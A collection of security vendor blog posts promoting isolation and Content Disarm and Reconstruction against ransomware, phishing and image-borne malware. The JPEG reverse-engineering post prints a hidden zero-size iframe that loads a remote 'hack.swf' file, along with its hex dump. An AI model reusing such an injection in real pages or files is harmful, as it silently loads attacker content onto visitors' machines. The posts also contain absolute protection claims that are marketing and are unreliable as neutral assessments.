Target: IT (Elementary)

Tags: Threat Prevention, Isolation, Malware, Ransomware, Data at rest. Content Disarm and Reconstruction

For years, the cybersecurity community has struggled to combat the growing ransomware threat. The headlines are all too familiar — critical infrastructure crippled, hospitals
brought to a standstill, and schools forced back to pen and paper, all while ransom demands flash across screens. As defenders, we have invested countless hours debating key
questions: Should ransoms ever be paid? What are the ethical implications? What are the legal consequences?

But we have been asking the wrong questions.

Instead of debating whether to negotiate with cybercriminals [1], it is time to shift the conversation toward preventing them altogether.   Rather than reacting after an attack occurs,
organizations must adopt a proactive security strategy that stops ransomware before it can be executed.

This is where endpoint application isolation, Content Disarm and Reconstruction (CDR), and data-at-rest security come into play. Together, these technologies establish a proactive,
prevention-first security strategy that detects ransomware and neutralizes its attack vectors before any damage can occur.

Prevention > Remediation

The traditional cybersecurity approach emphasizes detection, alerting, and remediation. However, modern ransomware attacks are now faster, stealthier, and more evasive than ever.
By the time an endpoint detection tool issues a warning, encryption may already be in progress—or even worse, the data may have been exfiltrated.

Detection alone is insufficient.

Prevention, through robust architectural controls, must be the primary line of defense.

Application Isolation: Containing Threats Before They Spread

Application isolation provides a secure environment for high-risk activities such as opening email attachments, downloaded files, and browsing the web. Inspired by air-gapped networks-
where sensitive systems are physically separated from unsecured environments- this approach applies the same principle to modern endpoints by isolating risky operations from the core
system.

When deployed at the endpoint level, isolation ensures all high-risk actions occur within a protected container, separate from the host operating system. If a malicious file executes or a
zero-day exploit attempts to launch ransomware from a phishing email, it remains trapped inside the container- never reaching the system.

The result? No spread, no persistence, no lateral movement.

And most importantly – no need for negotiation.

CDR:  Eliminating File-Based Threats at the Source

Content Disarm and Reconstruction (CDR) takes a proactive approach to file security by treating every file as a potential threat, regardless of whether traditional security tools detect
anything suspicious.  Instead of relying on signature-based detection, CDR neutralizes risks at the source by stripping files of all active and potentially harmful elements- such as embedded macros, scripts, and hidden exploits – while preserving their usability. The result is a clean, threat-free version of the original file, seamlessly delivered to the end user. By breaking the attack
chain at its earliest stage, CDR is particularly effective in stopping malware campaigns and ransomware infiltration before they can take hold.

Data-at-Rest Security: Protecting What Matters Most

Even if a threat actor breaches your defenses, their ultimate target is the data – whether to encrypt, steal, or leak it.  This is where data-at-rest security plays a crucial role.

By encrypting sensitive data and binding access to specific user identities or applications, organizations ensure that even if unauthorized users gain entry, the data remains inaccessible
and unusable. When combined with zero-trust access policies, this approach fortifies security at its core, preventing data compromise even in the event of a breach.

Shifting the Ransomware Defense Strategy: Prevention Over Negotiation

The message is clear: stop negotiating with ransomware after an attack [1] – prevent it from ever taking hold. Instead of reacting to breaches, organizations must focus on isolating systems
to block ransomware at its entry point.

This is not just a tactical adjustment – it is a strategic evolution. Businesses must move beyond a reactive security model overwhelmed by constant alerts, security operations center (SOC)
fatigue, and post-breach recovery. Instead, they need proactive technologies built on the assumption that attacks will happen – but designed to render those attacks irrelevant.

How BUFFERZONE Helps You Isolate, Disarm, and Protect

At BUFFERZONE®, we have spent years perfecting a prevention-based approach to endpoint protection.

• Our endpoint application isolation creates secure containers for browsers, email clients, and downloaded content, ensuring that threats remain sealed off from the host.
• Our advanced CDR engine sanitizes inbound files in real time, stripping out hidden threats before they reach users.
• Our data protection controls extend to both cloud and on-prem environments, ensuring sensitive files remain encrypted, monitored, and policy-enforced—even if compromised.
• Our NoCloud® AI technology runs advanced AI and Large Language Models (LLMs) directly on the endpoint—ensuring that sensitive data is analyzed securely, quickly, and
  privately. Unlike cloud-based solutions, NoCloud® never transmits your confidential information outside your device, delivering powerful intelligence without compromising data
  privacy.

Unlike legacy detection focused solutions, BUFFERZONE® does not rely on signatures or threat intelligence. Our philosophy is simple: if it cannot reach you, it cannot hurt you.

Final Thoughts

Ransomware is not going away—it is evolving. But so should our response.

Instead of planning for disaster recovery, we need to start planning for disaster prevention. With the right combination of isolation, file sanitization, and data security, we can eliminate
the need to negotiate, remediate, or rebuild.

Because the best way to deal with ransomware… is to never let it in.

Do you want to learn how BUFFERZONE® can help your organization transition from relying solely on detection to preventing ransomware?

Contact us to learn more.

References

[1] Doug Ennis , MSSP Alert, https://www.msspalert.com/perspective/we-dont-negotiate-with-terrorists-ransomware-strategy-in-modern-cybersecurity

Target: IT (Elementary)

Tags: Threat Prevention, Isolation, Malware, Ransomware

Ransomware attacks have become a pervasive threat in the United States, affecting organizations across various sectors. In 2024, 59% of organizations experienced ransomware attacks,
with the healthcare sector being the most impacted, accounting for 18.6% of annual attacks [1]. The average ransom payment in the U.S. during the third quarter of 2024 was approximately $479,237 [2].

The financial implications of ransomware are staggering. In 2023, ransomware attackers extorted over $1 billion from victims, marking a record high [3]. Looking ahead, ransomware is projected to cost its victims around $265 billion annually by 2031, with a new attack occurring every two seconds [4].

How Ransomware is Prevented Today

Organizations use multiple security layers to prevent ransomware, including:

• Endpoint Detection and Response (EDR): Monitors endpoints for suspicious activity and responds to threats.
• Antivirus and Anti-Malware Solutions: Detect known ransomware signatures and block them.
• Firewalls and Intrusion Detection Systems (IDS): Protect networks by filtering malicious traffic.
• Email Security Solutions: Identify phishing emails and block malicious attachments.
• Backup and Disaster Recovery: Ensures that organizations can recover data without paying ransom.
• Security Awareness Training: Educates employees on identifying phishing attempts and social engineering tactics.

Limitations of Traditional Security Approaches

While these methods provide some protection, they have critical weaknesses:

• Signature-Based Detection is Insufficient: Many ransomware variants are polymorphic, evading traditional antivirus solutions.
• EDR Requires Post-Infection Response: It detects and mitigates threats after an attack has already begun.
• Human Error is Inevitable: Despite training, employees may still fall victim to phishing attacks [5].
• Backup Strategies Are Vulnerable: Modern ransomware targets backup files, encrypting them before they can be restored.

The Zero-Trust Approach to Ransomware Prevention

To combat these challenges, many organizations are adopting zero-trust security models. Unlike traditional security frameworks that assume entities within the network are
trustworthy, zero-trust operates on the principle of “never trust, always verify.” Every access request is authenticated, authorized, and continuously validated, regardless of its origin.
To expand on this concept, applications, processes, and network communications can be isolated. Files are not detected since detection is based on trust; however, they are disarmed using
Content Disarm and Reconstruction (CDR). This model prevents ransomware from establishing a foothold in the system.

How Zero-Trust Solutions Stop Ransomware

• Micro-Segmentation: Limits lateral movement by isolating devices, applications, and workloads.
• Least Privilege Access: Ensures that users and applications only have access to what is strictly necessary.
• Multi-Factor Authentication (MFA): Reduces the risk of credential theft by requiring multiple forms of verification.
• Continuous Monitoring: Uses AI and behavioral analysis to detect anomalies in real time.
• Isolation Technology: Runs untrusted content in a secure environment to prevent execution of ransomware.

BUFFERZONE Protection By Containment™

BUFFERZONE® takes zero-trust security further by employing Protection By Containment™, which isolates external threats directly on the endpoint. This method ensures users can
interact with potentially risky content without exposing their system to ransomware.

Key Components:

• Safe Browser: Runs untrusted web sessions in an isolated container, preventing drive-by downloads and browser exploits. By using Browser Isolation, we significantly reduce
  the external attack vectors.
• Safe Mail: Opens email attachments and links in a virtualized environment, blocking malware execution.
• Safe Externals: Secures external storage devices like USBs, ensuring that infected files do not spread ransomware.
• SafeBridge® AI: Zero-Trust File Security ensures secure transfer of files from an isolated environment to a trusted network. BUFFERZONE utilizes SafeBridge®, a zero-trust
  file-handling solution that incorporates on-host Content Disarm and Reconstruction (CDR) technology. This technology sanitizes any active or suspicious content within files,
  delivering a reconstructed and secure version to prevent the spread of ransomware during file transfers. Powered by NoCloud® AI technology, we can identify and explain the
  evasive attack vectors hidden within the files.
• Safe Data: AI-powered Vault that protects data-at-rest from ransomware and other data-stealing threats. It actively scans files for business and legal confidential information
  and secures them in a virtual vault, ensuring that sensitive data remains protected from potential ransomware attacks. BUFFERZONE® data classification engine scans for confidential business data, medical information, and internal records, suggesting that sensitive information be stored in the vault.

Conclusion

The rising threat of ransomware necessitates a proactive and comprehensive security strategy. Traditional prevention methods provide some protection but are not foolproof.
The zero-trust model strengthens security by continuously verifying trust, limiting access, and isolating threats. BUFFERZONE® Protection By Containment™ technology, combined
with NoCloud® technology, with solutions like SafeBridge® AI, and Safe Data significantly enhance ransomware defenses by securing web browsing, email attachments, removable media,
file transfers, and sensitive data.

By integrating zero-trust principles with advanced isolation and AI-powered data protection, organizations can drastically reduce ransomware risks and protect their critical assets.

Contact us to learn more.

References

[1] Steve Alder, The HIPPA Journal Healthcare Ransomware Attacks Continue to Increase in Number and Severity, 2024

[2] Statista, Average amount of cyber ransom payments at organizations in the United States from 1st quarter 2022 to 3rd quarter 2024, https://www.statista.com/statistics/1409510/ransom-payment-us-quarterly-amount/, 2024

[3] Chainalysis ,  2024 Crypto Crime Trends: Illicit Activity Down as Scamming and Stolen Funds Fall, But Ransomware and Darknet Markets See Growth, https://www.chainalysis.com/blog/2024-crypto-crime-report-introduction/

[4] David Braue, Cybercrime Magazine, Global Ransomware Damage Costs Predicted to Exceed $265 Billion By 2031, https://cybersecurityventures.com/ransomware-report-2021/

[5] Verizon Data Breach, 2024 Data Breach Investigations Report, Verizon Data Breach Investigations Report 2024, 2024

Target: IT (Elementary)

Tags: Anti-Phishing, Gen-AI, Threat Prevention, Isolation, Malware, NoCloud®

Artificial Intelligence (AI) has rapidly transformed the cybersecurity landscape, serving as a defensive tool and a weapon for attackers.
A recent article from The Hacker News highlights a major shift in cyber threats:   , overwhelming traditional detection methods that rely on behavioral and
other pattern recognition, known threat signatures, and AI-based detection systems.  Research from the Financial Times reveals that cybercriminals are also
leveraging AI to craft highly convincing phishing emails aimed at corporate executives, blurring the line between legitimate communication and fraud.
These attacks often seek to steal sensitive information, compromise financial systems, or disrupt operations.

Gen-AI cyberattacks represent an escalating threat due to their sophistication. AI tools can generate hyper-realistic phishing emails that mimic individual or
organizational writing styles, making detection increasingly difficult. Additionally, Gen-AI powers personalized social engineering attacks by analyzing vast
amounts of data about individuals to craft highly targeted and persuasive messages. Its ability to create novel malware that evades traditional defenses, while
automating various aspects of attacks, enhances both the speed and effectiveness of cybercrimes.

The accessibility of Gen-AI tools has lowered the barrier to entry for cybercriminals, allowing even those with minimal technical expertise and financial resources
to execute advanced attacks. Moreover, the rapid evolution of Gen-AI models poses ongoing challenges for security teams to keep up with emerging threats, including
deep-fake attacks that manipulate audio recordings and conversations to deceive targets. Just recently, Bleepingcomputer reported that LastPass revealed a failed phishing
attempt where hackers used a deepfake audio of their CEO to try and deceive employees. The attack was done through WhatsApp, a communication channel the CEO does
not use for business purposes. Recognizing the unusual choice of platform, the employee identified the irregularity and avoided falling victim to the scam.
This convergence of AI-driven cyber capabilities underscores the urgent need for innovative and adaptive cybersecurity measures.

The Challenges of GEN-AI Detection

Detection-based security solutions, such as antivirus software, Endpoint Detection and Response (EDR) systems, and Intrusion Detection Systems (IDS), rely on identifying
known malicious patterns or behaviors. However, generative AI poses a significant challenge to these systems by crafting malware designed to evade detection.
Techniques like obfuscation and polymorphism enable AI-generated threats to continuously adapt and challenge traditional detection methods increasingly ineffective.
For example, By leveraging machine learning, attackers can:

• Evade Static Analysis: Generate malware variants with unique signatures, making them unrecognizable to traditional static analysis tools.
• Confuse Behavioral Analysis: Create malicious code with dynamic behaviors that appear benign during observation.
• Scale Attacks: Automate malware creation to overwhelm detection systems with thousands of new strains daily.

Advancements in Gen AI highlight the shortcomings of detection-based security. While detection remains an essential element of a multi-layered defense strategy, it struggles
to keep pace with the evolving and adaptive nature of Gen AI-driven threats.

Shifting the Paradigm to Prevention Powered by AI

Organizations encounter a range of security challenges and should prioritize prevention-focused solutions to strengthen their security posture. Prevention strategies take a
proactive approach, aiming to block threats before they can cause harm. Two highly effective technologies in this domain are application isolation and advanced AI phishing
detection.
The Hacker News presented two use cases, the first based on malware generation and the other based on JavaScript phishing attack generation.

BUFFERZONE® offers a new perspective on solving security challenges through two innovative technologies: Protection By Containment™ and NoCloud® AI.
The first technology isolates external threats that may arise from web browsing, file downloads, and email links or attachments. The second technology prevents attacks
beyond isolation using advanced AI.

• Protection by Isolation Technology: create a virtual container for running applications and opening files, ensuring that any malicious activity is confined to a secure
  environment.
  The solution contains:
  • Safe Browser: Chrome, Edge, and Firefox browser isolation within the containment. File downloads are secured inside the isolation. SafeBridge® employs a zero-trust
    Content Disarm and Reconstruction (CDR) process to transfer them, which can be handled automatically or manually.
  • Safe Mail: emails are automatically CDR, and email attachments/links can be opened in a virtual isolated environment, preventing the malware from accessing the host
    system.
  • Safe Externals: isolation of USB, CD, and DVD while enabling the ability to open and edit images, videos, and documents securely.

Isolation ensures that even if malware bypasses detection, its impact is nullified, protecting the endpoint and the internal networks.

• NoCloud® Advanced Phishing Detection: While Protection By Containment ™ Isolate external threats, some attacks happen beyond isolation, and phishing attacks are
  one example.Phishing continues to be a primary attack vector, with Gen AI amplifying the issue by creating highly convincing phishing content.   Advanced phishing detection tools use AI to
  analyze URLs, page content, and brand impersonation in real time, preventing users from interacting with malicious sites. Endpoint-based phishing detection is particularly crucial
  because it operates independently of reputation databases, which can lag in identifying emerging threats. While most phishing solutions today rely on reputation, this approach is
  limited by Gen AI’s rapid ability to create new permutations. Therefore, a secure, real-time alternative like NoCloud® which avoids uploading sensitive data – is essential.

The Case for Endpoint-Centric Security

Gen AI’s ability to generate malware and phishing campaigns underscores the importance of endpoint-centric security. By deploying isolation and advanced phishing detection
directly on endpoints, organizations can:

• Minimize the attack surface by preventing threats at the point of entry.
• Reduce reliance on network-based solutions, which may not catch threats targeting remote or distributed endpoints.
• Ensure real-time protection, even against zero-day threats or novel attack techniques.

Preparing for the Future

The rise of Gen AI-driven threats marks a turning point in cybersecurity. To stay ahead, organizations must:

• Invest in innovative prevention technologies that integrate isolation and AI-driven detection.
• Educate users about the risks of phishing and other social engineering attacks.
• Continuously evaluate and update their security posture to address evolving threats.
• As attackers leverage AI to bypass detection, the security industry must innovate to outsmart them. Prevention, powered by isolation and advanced endpoint AI technologies,
  is no longer optional but essential. By adopting these strategies, organizations can safeguard their systems and data against the next wave of AI-driven cyber threats.

Contact us to learn more.

Target: Cybersecurity specialist

Tags: JPEG, Image, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering, Protection by containment™

In this article, we venture into the intricacies of malicious malware attacks deployed via Joint Photographic Experts Group (JPEG) images, demystifying the techniques for
reverse-engineering these files. We will scrutinize the application of Content Disarm and Reconstruction (CDR) technology in neutralizing such threats, thereby safeguarding
images from covert malware implantation. The preceding series of blogs provided insights into the arena of steganography detection, termed as steganalysis, in part-1, and the
pivotal role of CDR in precluding steganographic malware onslaughts in part-2.

As highlighted in the earlier blogs, we are witnessing a surge in image-based cyberattacks. For instance, images from the James Webb Space Telescope [1] were manipulated as
part of a malware stratagem. These compromised visuals were disseminated through websites or embedded within documents. The specifics of these threats fluctuate across
different attacks. In certain scenarios, malicious code can be appended to the end of a file, minor adjustments can be made to individual bits of the code, or alterations can be
introduced in the metadata linked with a file. In other instances, innocent windows logos were exploited by using steganography attack to hide malicious backdoors [2].

JPEG File Format

JPEG is a widely used method of lossy compression for digital images, particularly for those images produced by digital photography. The degree of compression can be adjusted,
allowing a selectable tradeoff between storage size and image quality. JPEG typically achieves 10:1 compression with little perceptible loss in image quality.
The file name usually ends with .jpg or .jpeg extension and is widely accepted and used in digital photography, web graphics and image archiving.

The JPEG compression algorithm works primarily in the following stages:

• Color Space Conversion: The image data is converted from RGB color space to YCbCr. The Y component represents luminance (brightness), while the Cb and Cr
  components represent chrominance (color). This allows the algorithm to take advantage of the human eye’s higher sensitivity to changes in brightness than to changes in color.
• Subsampling: The chrominance components are typically subsampled to further reduce the amount of data. This is based on the fact that human eyes are less sensitive to
  changes in color information than brightness.
• Block Splitting: The image is divided into blocks of 8×8 pixels.
• Discrete Cosine Transform (DCT): Each block is then transformed from spatial domain to frequency domain using DCT. The DCT expresses a finite sequence of data
  points in terms of a sum of cosine functions oscillating at different frequencies.
• Quantization: The DCT coefficients are then quantized. This is the lossy part of the JPEG compression. Higher frequency components (which correspond to fine detail
  and texture in the image) are usually quantized more heavily than lower frequency components.
• Entropy Coding: Lastly, lossless entropy coding (which involves a form of Huffman coding or arithmetic coding) is applied to compress the quantized values more.

JPEG File Format

A JPEG file structure is composed from several segments or sections, each with a specific function:

• Start of Image (SOI): This marker denotes the beginning of the image data. It consists of two bytes: 0xFF and 0xD8.
• Application-Specific Markers (APP0 to APP15): These are optional markers and are used for different purposes, such as storing metadata.
  APP0 and APP1 are the most used, with APP0 often used for JFIF (JPEG File Interchange Format) data, and APP1 commonly used for EXIF data.
• Quantization Table (DQT): This segment contains one or more quantization tables. These tables are used during the quantization phase of compression, where the
  DCT coefficients are divided by the quantization coefficients.
• Huffman Table (DHT): This segment contains one or more Huffman tables, used for entropy coding. They define the Huffman code words for different values that are
  encoded and decoded.
• Start of Frame (SOF): This marker indicates the beginning of the frame data. There are several types of SOF markers depending on the type of compression used.
  It contains information about the image dimensions and the number of color components in the image.
• Start of Scan (SOS): This marker indicates the start of a new scan. A scan can be thought of as a layer of the image, and multiple scans can be used for progressive JPEGs.
  It is followed by the actual image data.
• End of Image (EOI): This marker indicates the end of the image data. Like the SOI, it consists of two bytes: 0xFF and 0xD9.

It is also worth noting that many JPEG files contain metadata in the form of EXIF (Exchangeable Image File Format) data. This can include information such as camera settings,
timestamps, geolocation, and copyright information. The EXIF data is usually stored in an APP1 marker segment.

In addition to these, there are several other markers used for things like defining restart intervals (DRI), comments (COM), and more.

Image Investigation Tools

In this blog, we will use the well-known ExifTool and JPEGDump. ExifTool is a software program that allows users to read, write, and edit metadata in a wide variety of files.
Created by Phil Harvey, it is a versatile tool that is especially valuable for handling image, audio, and video metadata. By viewing the file metadata, we can view malicious code
hidden inside the metadata.

JPEGDump was created by Didier Stevens, it allows users to analyze the structure and contents of JPEG files, particularly useful in cases where these files may have been used to
hide or transport malicious data. JPEGDump tool parses a JPEG file and breaks down the different sections, or markers, providing insight into the file’s structure.
This includes but is not limited to markers for the Start of Image (SOI), Application markers like Exif or JFIF, Start of Scan (SOS), Define Huffman Table (DHT), and End of Image (EOI).
By using JPEGDump, an analyst can get a more detailed understanding of what is in a JPEG file beyond just the visible image.
This is particularly useful when looking for signs of steganography (the practice of concealing data within other data) or other forms of data hiding, for example data hidden between
sections or at the end of the file.

Reverse Engineer JPEG Image

We will research sha256: 1bd88ba79ff1c3fd163a510c6b0dab61a645735de5def59a2b675d5f2faacfd7.

We will start with ExifTool since it provides a straightforward way to view the file metadata and properties.

Exiftool <path>

In this case we do not see in this partial output any suspicious activity. Other cases you may see it in the image description, copyrights, or other metadata sections.

Now we will turn to use JPEGDump we first run it as follows python jpegdump.py <file>:

File: 1bd88ba79ff1c3fd163a510c6b0dab61a645735de5def59a2b675d5f2faacfd7

1 p=0x00000000    : m=ffd8 SOI

2 p=0x00000002 d=0: m=ffe0 APP0  l=   16 e=2.549523 a=28.615385

3 p=0x00000014 d=0: m=ffe1 APP1  l=45914 e=4.200871 a=33.829670

4 p=0x0000b370 d=0: m=ffed APP13 l= 2630 e=6.982704 a=60.845070

5 p=0x0000bdb8 d=0: m=ffee APP14 l=   14 e=2.751629 a=33.090909

6 p=0x0000bdc8 d=0: m=ffdb DQT   l=  132 e=2.809793 a=1.069767 remark: 130/65 = 2.000000

7 p=0x0000be4e d=0: m=ffc0 SOF0  l=   17 e=2.739572 a=24.500000 remark: p=8 h=800 w=347 c=3

8 p=0x0000be61 d=0: m=ffdd DRI   l=    4 e=1.000000 a=44.000000

9 p=0x0000be67 d=0: m=ffc4 DHT   l=  418 e=7.034882 a=37.513253

10 p=0x0000c00b d=0: m=ffda SOS   l=   12 e=2.446439 a=21.222222 remark: c=3

p=0x0000c15d    : m=ffd0 RST0

p=0x0000c2a0    : m=ffd1 RST1

p=0x0000c3f8    : m=ffd2 RST2

p=0x0000c52e    : m=ffd3 RST3

p=0x0000c6e2    : m=ffd4 RST4

p=0x0000c90e    : m=ffd5 RST5

p=0x0000cb91    : m=ffd6 RST6

p=0x0000ce31    : m=ffd7 RST7

p=0x0000d15d    : m=ffd0 RST0

p=0x0000d497    : m=ffd1 RST1

p=0x0000d737    : m=ffd2 RST2

p=0x0000d956    : m=ffd3 RST3

p=0x0000da9e    : m=ffd4 RST4

p=0x0000dc29    : m=ffd5 RST5

p=0x0000ddee    : m=ffd6 RST6

p=0x0000e047    : m=ffd7 RST7

p=0x0000e2b4    : m=ffd0 RST0

p=0x0000e50d    : m=ffd1 RST1

p=0x0000e76a    : m=ffd2 RST2

p=0x0000ea53    : m=ffd3 RST3

p=0x0000ec9b    : m=ffd4 RST4

p=0x0000ef13    : m=ffd5 RST5

p=0x0000f194    : m=ffd6 RST6

p=0x0000f377    : m=ffd7 RST7

p=0x0000f4b6    : m=ffd0 RST0

p=0x0000f636    : m=ffd1 RST1

p=0x0000f80d    : m=ffd2 RST2

p=0x0000fa80    : m=ffd3 RST3

p=0x0000fd4f    : m=ffd4 RST4

p=0x00010040    : m=ffd5 RST5

p=0x0001030c    : m=ffd6 RST6

p=0x000105ae    : m=ffd7 RST7

p=0x000107fd    : m=ffd0 RST0

p=0x00010a31    : m=ffd1 RST1

p=0x00010c00    : m=ffd2 RST2

p=0x00010de0    : m=ffd3 RST3

p=0x00010fa8    : m=ffd4 RST4

p=0x00011167    : m=ffd5 RST5

p=0x0001138c    : m=ffd6 RST6

p=0x000115d9    : m=ffd7 RST7

p=0x000118a7    : m=ffd0 RST0

p=0x00011b94    : m=ffd1 RST1

p=0x00011ea1    : m=ffd2 RST2

p=0x000121b0    : m=ffd3 RST3

p=0x000124e2    : m=ffd4 RST4

p=0x0001273a    : m=ffd5 RST5

p=0x00012960    : m=ffd6 RST6

p=0x00012b42    : m=ffd7 RST7

p=0x00012cc3    : m=ffd0 RST0

p=0x00012e6b    : m=ffd1 RST1

p=0x000130a7    : m=ffd2 RST2

p=0x00013371    : m=ffd3 RST3

p=0x000135f8    : m=ffd4 RST4

p=0x00013890    : m=ffd5 RST5

p=0x00013b58    : m=ffd6 RST6

p=0x00013dfa    : m=ffd7 RST7

p=0x000140f8    : m=ffd0 RST0

p=0x000143c0    : m=ffd1 RST1

p=0x000145e7    : m=ffd2 RST2

p=0x00014801    : m=ffd3 RST3

p=0x00014989    : m=ffd4 RST4

p=0x00014af5    : m=ffd5 RST5

p=0x00014caa    : m=ffd6 RST6

p=0x00014e8d    : m=ffd7 RST7

p=0x000150d0    : m=ffd0 RST0

p=0x0001536c    : m=ffd1 RST1

p=0x0001561f    : m=ffd2 RST2

p=0x000158c0    : m=ffd3 RST3

p=0x00015b8d    : m=ffd4 RST4

p=0x00015df7    : m=ffd5 RST5

p=0x00015f9d    : m=ffd6 RST6

p=0x00016123    : m=ffd7 RST7

p=0x000162ad    : m=ffd0 RST0

p=0x00016463    : m=ffd1 RST1

p=0x000166d6    : m=ffd2 RST2

p=0x000169f0    : m=ffd3 RST3

p=0x00016c7f    : m=ffd4 RST4

p=0x00016f25    : m=ffd5 RST5

p=0x0001722e    : m=ffd6 RST6

p=0x000174af    : m=ffd7 RST7

p=0x000176a9    : m=ffd0 RST0

p=0x00017894    : m=ffd1 RST1

p=0x00017a55    : m=ffd2 RST2

p=0x00017bf2    : m=ffd3 RST3

p=0x00017dac    : m=ffd4 RST4

p=0x00017fad    : m=ffd5 RST5

p=0x000181c9    : m=ffd6 RST6

p=0x00018410    : m=ffd7 RST7

p=0x000186c8    : m=ffd0 RST0

p=0x00018993    : m=ffd1 RST1

p=0x00018c07    : m=ffd2 RST2

p=0x00018ee5    : m=ffd3 RST3

p=0x000191d7    : m=ffd4 RST4

p=0x00019455    : m=ffd5 RST5

p=0x000195ec    : m=ffd6 RST6

p=0x0001977e    : m=ffd7 RST7

p=0x00019908    : m=ffd0 RST0

p=0x00019ab0    : m=ffd1 RST1

p=0x00019c5e    : m=ffd2 RST2

entropy-coded data: l=56814 e=7.968988 a=84.686040 #ff00=171

11 p=0x00019e07 d=0: m=ffd9 EOI

12 p=0x00019e09    : *trailing*  l=   79 e=4.714881

We can observe that the file starts with SOI and ends with EOI. In this file we can see that marker 12(red) has trailing data with length of 79.

To simply view the data, we can use: python jpegdump –s 12 <file>

The output is as follows:

00019E09: 3C 69 66 72 61 6D 65 20  73 72 63 3D 68 74 74 70  <iframe src=http

00019E19: 3A 2F 2F 69 64 63 2E 39  65 33 2E 63 6F 6D 2F 77  ://idc.9e3.com/w

00019E29: 65 62 2F 68 61 6F 31 32  33 2F 68 61 63 6B 2E 73  eb/hao123/hack.s

00019E39: 77 66 20 77 69 64 74 68  3D 30 20 68 65 69 67 68  wf width=0 heigh

00019E49: 74 3D 30 3E 3C 2F 69 66  72 61 6D 65 3E 0D 0A     t=0></iframe>..

The code contains an Iframe with a URL with a static resource of Adobe SWF (Shockwave Flash Movie). At the time of this blog the link is not active anymore.

From VirusTotal we can observe that 22 engines detected the file as malicious, however, the URL reputation is currently clean, and the resource is not available
(old sample analyzed last time 12 hours ago but originally from 2014).

Detection Is Not Enough

In this example from 2014, which is straightforward to examine, the detection rate was 22 out of 59. Nevertheless, with more convoluted attacks, the detection rate tends to be
significantly lower. Content Disarm and Reconstruction (CDR) is a zero-trust file prevention strategy that does not hinge on detection. CDR sterilizes files, eliminates metadata,
and purges hidden data, regardless of whether this data is malicious or suspicious. This guarantees the safety of the content (for more details, please refer to Part-2 of this series).

BUFFERZONE’s SafeBridge™ that  it’s strategic concept is Protection by containment™ automatically neutralizes the threats present in images. Consequently, it is observable that
the image post-CDR no longer houses any malicious Iframe.
As evidenced in prior research [3], it has been established that the sanitized image remains visually indistinguishable from the original image.

If you want to view documents or images before CDR, use BUFFERZONE® Safe Workspace™. BUFFERZONE Safe Workspace™  (that  it’s strategic concept is Protection by containment™)
is a suite of prevention capabilities based on application isolation technology that includes Safe Browsing, SafeBridge® (Content Disarm and Reconstruction capabilities), and Safe Removable (USB attack prevention), all combined with clipboard security. Safe Workspace™ virtual container is created by a kernel driver, which virtually separates the operating system into two logical zones. The first is the trusted zone, which is connected to all the organization’s networks and the operating system’s files. The second zone is called the untrusted zone, which acts as a buffer zone where different applications can securely run isolated from the trusted zone’s memory, files, registry, and processes. This method offers advantages such as low CPU and memory footprint, high quality of experience, and the ability to seamlessly
work inside the virtual container without noticing that you are protected from browsing and USB threats. BUFFERZONE® is the only virtual containment solution based on six patented technologies. By using an advanced isolation solution, the organization’s content is secure. Downloaded attachments are isolated, while antivirus and EDR (Endpoint Detection and Response) solutions can always scan the untrusted virtual zone. The virtual environment can be cleaned in one click, eliminating any malicious traces. Ransomware will not be able to run and attack the endpoint.

Try it now!

References

[1] Bill Toulas , Hackers hide malware in James Webb telescope images, https://www.bleepingcomputer.com/news/security/hackers-hide-malware-in-james-webb-telescope-images/ .

[2] Bill Toulas , Hacking group hides backdoor malware inside Windows logo image,  https://www.bleepingcomputer.com/news/security/hacking-group-hides-backdoor-malware-inside-windows-logo-image/ .

[3] Eli Belkind and Ran Dubin and Amit Dvir , Open Image Content Disarm And Reconstruction}, 2023, https://arxiv.org/abs/2307.14057

Target: IT Professionals

Tags: Malware, Ransomware Zero-Trust, Safe Workspace™, Safe Browsing

A recent phishing scheme has been detected using a Russian-language Microsoft Word document as a vehicle to distribute malware. This malware, targeting Windows systems,
is designed to steal sensitive data as reported by The Hacker News.

The operation is linked to a group known as Konni, which has connections with a North Korean faction identified as Kimsuky (also known as APT43).

The campaign employs a remote access trojan (RAT) that can both gather data and control infected devices. This cyber espionage group, known for its focus on Russia, typically
initiates its attacks via spear-phishing emails and harmful documents. The document’s Visual Basic for Application (VBA) macro once enabled triggers an intermediate Batch script.
This script conducts system checks and bypasses User Account Control (UAC), setting the stage for the introduction of a DLL file. This file is equipped for both data collection and extraction.
The malicious payload features a UAC bypass mechanism and secure communication with a command-and-control (C2) server. This allows the attackers to carry out high-level commands remotely.

Macro Based Attacks – What can we do?

The combination of lure (phishing) content and macro is one of the most common attack vectors that keeps hitting organizations. The methos is so successful that although everyone knows
it still works. The problem starts in our current existing security controls that are based on detection.
Malware detection has advanced significantly with the introduction of Artificial Intelligence (AI) however, it is not 100% and organization is at risk.

At BUFFERZONE®, we advocate for IT solutions that are both straightforward and impactful. That is why we have introduced an alternative approach centered on zero-trust malware
prevention. Unlike traditional security models that depend on detection and inherently involve a degree of trust, our method introduces two key innovations.
The first is our patented isolation technology, which creates a secure barrier between potential threats and the system. The second is our pioneering zero-trust file security feature,
known as Content Disarm and Reconstruction. This approach ensures a robust and preemptive stance against cybersecurity threats, aligning with our commitment to simplicity
and effectiveness in IT security.

BUFFERZONE® Safe Workspace™ for endpoints provides robust protection against all forms of downloaded and attached malware. By creating a controlled environment,
Safe Workspace™ effectively contains and neutralizes potential threats before they can cause any damage. This advanced security solution alleviates organizations’ constant
worry about threats such as USB-borne attacks, file-less malware, ransomware, and widespread phishing attempts.

BUFFERZONE® creates two distinct zones: a virtual trusted zone and an untrusted zone. Within the untrusted zone, users can freely browse the internet, open Microsoft Outlook
links and attachments, and access removable media such as USBs. Meanwhile, the trusted zone remains securely isolated and is a gateway to the organization’s secure content.

Keep your IT simple and effective

Contact us for more details.

Target: IT Professionals

Tags: Malware, Phishing, Zero-Trust, Isolation

Cybercriminals have tapped into a vast network of fabricated and breached Facebook profiles, unleashing millions of deceptive Messenger messages aimed at Facebook business accounts, embedding password-theft malware [1].

The malefactors craftily deceive the recipients into downloading an archive (either in RAR or ZIP format), which includes a downloader for a cunning Python-based program designed to
extract stored cookies and passwords from the user’s browser.

The initial approach these criminals take is to send deceptive Messenger messages to business accounts on Facebook. These messages masquerade as copyright infringement notifications
or product information inquiries. An attached archive, when executed, retrieves a malware installer from GitHub repositories, cleverly bypassing detection mechanisms and leaving minimal footprints.

This attached archive not only delivers the payload (termed project.py) but also procures a standalone Python environment essential for the malware’s information theft activities.
For sustained malicious activity, it ensures the malware launches during system startup.

With a sophisticated design, the project.py file is layered with five stages of obfuscation, making it especially tricky for anti-virus systems to identify and neutralize the threat.

